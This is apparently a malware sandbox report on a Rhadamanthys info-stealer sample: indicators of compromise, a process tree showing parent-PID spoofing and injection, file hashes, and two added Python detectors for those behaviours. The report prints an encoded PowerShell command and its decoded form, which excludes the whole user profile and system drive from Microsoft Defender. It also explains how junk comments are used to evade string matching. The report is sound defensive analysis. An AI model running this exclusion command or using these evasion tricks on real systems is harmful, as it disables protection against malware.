Analysis
-
max time kernel
115s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system -
submitted
05-04-2024 01:05
Static task
static1
Behavioral task
behavioral1
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win10v2004-20240226-en
General
-
Target
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
-
Size
597KB
-
MD5
d6abeeea631ceedc9704b11198ddb305
-
SHA1
32c3d810eef2eefa3e317001657f6e5beb839080
-
SHA256
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72
-
SHA512
b648a43f3fd6bf9c5594b8d0fa882eacd5714d2b69d295ef8c749ef5cae81846ed148034cc9cbc46912fdc959d83f4d9e9f822552f5ddba5a45c1d4e4150d876
-
SSDEEP
12288:pjImsaOOmzPgf/zaUR58rAfTFIg4biQN9Az+I:pjqOmzIDaG58UfTFwnP
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exe
description | pid | process | target process
PID 2504 created 2364 | 2504 | svchost.exe | sihost.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
-
Executes dropped EXE 2 IoCs
Processes:
XWormLoader.exe, svchost.exe
pid | process
4900 | XWormLoader.exe
2504 | svchost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exe
pid | pid_target | process | target process
2564 | 4900 | WerFault.exe | XWormLoader.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
svchost.exe, powershell.exe, powershell.exe, dialer.exe (12 entries, aggregated by process)
pid | process | count
2504 | svchost.exe | 2
112 | powershell.exe | 3
3544 | powershell.exe | 3
1664 | dialer.exe | 4
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 3544 | powershell.exe
Token: SeDebugPrivilege | 112 | powershell.exe
-
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe, svchost.exe (17 entries, aggregated by writer/target pair)
description | pid | process | target process | count
PID 3556 wrote to memory of 3544 | 3556 | 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe | powershell.exe | 3
PID 3556 wrote to memory of 112 | 3556 | 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe | powershell.exe | 3
PID 3556 wrote to memory of 4900 | 3556 | 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe | XWormLoader.exe | 3
PID 3556 wrote to memory of 2504 | 3556 | 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe | svchost.exe | 3
PID 2504 wrote to memory of 1664 | 2504 | svchost.exe | dialer.exe | 5
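The NtCreateUserProcessOtherParentProcess entry and the WriteProcessMemory entries above fit together: the dropped svchost.exe (PID 2504, running from the user's Temp folder) creates a process while declaring sihost.exe (PID 2364) as its parent, and then writes into that child, which the process tree shows as dialer.exe (PID 1664) under sihost.exe. A tree built from recorded parent PIDs alone therefore hides the real creator. The following is an added example, not the sandbox's own signature code: it correlates creator-versus-declared-parent records with memory-write records, and separately flags system-binary names loaded from outside the Windows system directories. The records are constructed from this report; the field names and the system-binary list are assumptions of the example.

```python
"""Correlate sandbox process events to catch parent-PID spoofing followed by injection.

Added example, not the sandbox's own signature code. The records below are
constructed from this report: the process tree, the single
NtCreateUserProcessOtherParentProcess entry (creator 2504 svchost.exe, declared
parent 2364 sihost.exe; the child is the dialer.exe node, PID 1664, that the tree
hangs under sihost.exe) and the WriteProcessMemory entries. Field names are
assumptions of this example.
"""
import ntpath
from collections import defaultdict

# Constructed from the report's process tree: pid -> (image path, parent pid the OS recorded).
PROCESS_TREE = {
    2364: (r"C:\Windows\system32\sihost.exe", None),
    1664: (r"C:\Windows\SysWOW64\dialer.exe", 2364),
    3556: (r"C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe", None),
    3544: (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 3556),
    112:  (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 3556),
    4900: (r"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe", 3556),
    2504: (r"C:\Users\Admin\AppData\Local\Temp\svchost.exe", 3556),
}

# Constructed from the NtCreateUserProcessOtherParentProcess entry: who issued the
# create call versus which PID the new process records as its parent.
CREATE_EVENTS = [
    {"creator_pid": 2504, "child_pid": 1664, "declared_parent_pid": 2364},
]

# Constructed from the WriteProcessMemory entries, de-duplicated: (writer pid, target pid).
WRITE_EVENTS = [(3556, 3544), (3556, 112), (3556, 4900), (3556, 2504), (2504, 1664)]

# Binary names that should only load from the Windows system directories (assumed list).
SYSTEM_BINARIES = {"svchost.exe", "sihost.exe", "dialer.exe", "powershell.exe", "werfault.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def image_name(tree, pid):
    """Lower-cased file name of a pid's image, '<unknown>' if the tree lacks it."""
    path = tree.get(pid, ("<unknown>", None))[0]
    return ntpath.basename(path).lower()


def find_ppid_spoofing(create_events, write_events, tree):
    """A create call whose declared parent is not the caller is PPID spoofing
    (the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS trick). Report it together with
    whether the same caller then wrote into the child, the injection pattern here."""
    writers = defaultdict(set)
    for src, dst in write_events:
        writers[dst].add(src)
    findings = []
    for ev in create_events:
        creator, child, declared = ev["creator_pid"], ev["child_pid"], ev["declared_parent_pid"]
        if creator == declared:
            continue
        findings.append({
            "child": (child, image_name(tree, child)),
            "creator": (creator, image_name(tree, creator)),
            "declared_parent": (declared, image_name(tree, declared)),
            # True when a tree built from recorded PPIDs alone would hide the real creator.
            "tree_hides_creator": tree.get(child, (None, None))[1] == declared,
            "injected_by_creator": creator in writers[child],
        })
    return findings


def find_masquerading(tree):
    """PIDs whose image carries a system-binary name but lives outside the system
    directories (here the dropped svchost.exe in the user's Temp folder)."""
    hits = []
    for pid, (path, _ppid) in tree.items():
        name = ntpath.basename(path).lower()
        if name in SYSTEM_BINARIES and not path.lower().startswith(SYSTEM_DIRS):
            hits.append(pid)
    return sorted(hits)


if __name__ == "__main__":
    for finding in find_ppid_spoofing(CREATE_EVENTS, WRITE_EVENTS, PROCESS_TREE):
        print("PPID spoofing:", finding)
    print("masquerading pids:", find_masquerading(PROCESS_TREE))
```

The creator PID is the field that matters: Sysmon-style process-creation events carry only the parent the child records, so a detection built on those alone sees dialer.exe as a legitimate child of sihost.exe. Kernel process-creation callbacks and most sandboxes also expose the calling process, which is what the sandbox's own signature keys on.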
Processes
-
C:\Windows\system32\sihost.exe
  command line: sihost.exe
  PID: 2364
  -
  C:\Windows\SysWOW64\dialer.exe
    command line: "C:\Windows\system32\dialer.exe"
    - Suspicious behavior: EnumeratesProcesses
    PID: 1664
-
C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3556
  -
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3544
  -
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcgBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcABnACMAPgA="
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 112
  -
  C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
    - Executes dropped EXE
    PID: 4900
    -
    C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 884
      - Program crash
      PID: 2564
  -
  C:\Users\Admin\AppData\Local\Temp\svchost.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2504
-
C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4900 -ip 4900
  PID: 2204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2432,i,12161922670941700748,3348345705955601576,262144 --variations-seed-version /prefetch:8
  PID: 2404
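The -EncodedCommand argument of the second powershell.exe (PID 112) is base64 over UTF-16LE, which is what powershell.exe expects. Decoded, it is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, interleaved with junk <# ... #> block comments (<#jix#>, <#mrh#>, <#wjb#>, <#xpg#>) that break naive string matching: a Microsoft Defender exclusion covering the whole user profile and the whole system drive, which explains why the process needed SeDebugPrivilege-level elevation to matter at all. The following is an added example, not the sandbox's or the sample's own code: it pulls the blob out of the command line as the report prints it, decodes it, strips the comments and flags the exclusion. The prefix handling for the flag, the comment stripping and the list of flagged cmdlet parameters are assumptions of the example.

```python
"""Decode a PowerShell -EncodedCommand argument and flag Defender exclusion tampering.

Added example, not part of the sandbox report. The command line below is copied
from the report's process tree (PID 112); the parsing rules and the flagged
cmdlet/parameter table are assumptions of this example, not the sandbox's own
signature logic.
"""
import base64
import re

# Command line as the report prints it for PID 112.
CMDLINE_PID_112 = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand '
    '"PAAjAGoAaQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcgBoACMAPgAg'
    'AC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkA'
    'bABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBiACMAPgAgAC0ARgBv'
    'AHIAYwBlACAAPAAjAHgAcABnACMAPgA="'
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix, longest first, followed by a quoted or bare base64 blob.
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENCODED_RE = re.compile(rf'-(?:{_PREFIXES})\s+"?([A-Za-z0-9+/=]+)', re.IGNORECASE)

BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.DOTALL)

# Cmdlet/parameter pairs that weaken Microsoft Defender; an assumed list for this example.
DEFENDER_TAMPER = {
    "add-mppreference": ("-exclusionpath", "-exclusionprocess", "-exclusionextension"),
    "set-mppreference": ("-exclusionpath", "-exclusionprocess", "-exclusionextension",
                         "-disablerealtimemonitoring"),
}


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None when the flag is absent.
    The blob is base64 over UTF-16LE, the encoding powershell.exe requires."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def normalize_script(script):
    """Drop <# ... #> block comments (the sample wedges them between tokens) and
    collapse whitespace so token matching is reliable."""
    return " ".join(BLOCK_COMMENT_RE.sub("", script).split())


def exclusion_paths(script):
    """Extract the -ExclusionPath argument; handles a bare value or an @(a,b) array."""
    m = re.search(r"-exclusionpath\s+(\S+)", script, re.IGNORECASE)
    if not m:
        return []
    value = m.group(1)
    if value.startswith("@(") and value.endswith(")"):
        value = value[2:-1]
    return [p.strip().strip("'\"") for p in value.split(",") if p.strip()]


def defender_tamper_findings(cmdline):
    """Decode, normalize and report which Defender-weakening parameters the script uses."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    norm = normalize_script(script)
    tokens = [t.lower() for t in norm.split()]
    findings = []
    for cmdlet, params in DEFENDER_TAMPER.items():
        if cmdlet in tokens:
            hit = [p for p in params if p in tokens]
            if hit:
                findings.append({"cmdlet": cmdlet, "params": hit,
                                 "paths": exclusion_paths(norm), "script": norm})
    return findings


if __name__ == "__main__":
    for finding in defender_tamper_findings(CMDLINE_PID_112):
        print(finding["cmdlet"], finding["params"], finding["paths"])
        print("  ", finding["script"])
```

Two details matter for anyone turning this into a detection: match on the decoded, comment-stripped script rather than on the raw command line, since the base64 blob changes with every junk comment the packer inserts, and do not anchor on the literal string -EncodedCommand, because -e and -enc run the same code path.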
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2KB
MD5
968cb9309758126772781b83adb8a28f
SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD5
c0932eec2abeb657499527e72bdd1c2e
SHA1
f03f108ddef7a826c7ee03a2bfa608b92b3afc19
SHA256
4ccb7fcea78aabfc03bc2ddbd7771fba9108f89e821814eed8ded6d7e4235542
SHA512
b5ac278e291d9d6b5b401ba578d4d395f5f9c50f17d2d4220a4799b081e4f168c643982c72ceccf96fd82a136e40350a88479170cbe30d1a60e8f665136fcab5
-
Filesize
101KB
MD5
39d81ca537ceb52632fbb2e975c3ee2f
SHA1
0a3814bd3ccea28b144983daab277d72313524e4
SHA256
76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA512
18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
355KB
MD5
2ef91bf37b3da8cad6751b665bd4e6af
SHA1
5c15bbc721f91855388861d378cf9d26a140cead
SHA256
5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512
16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3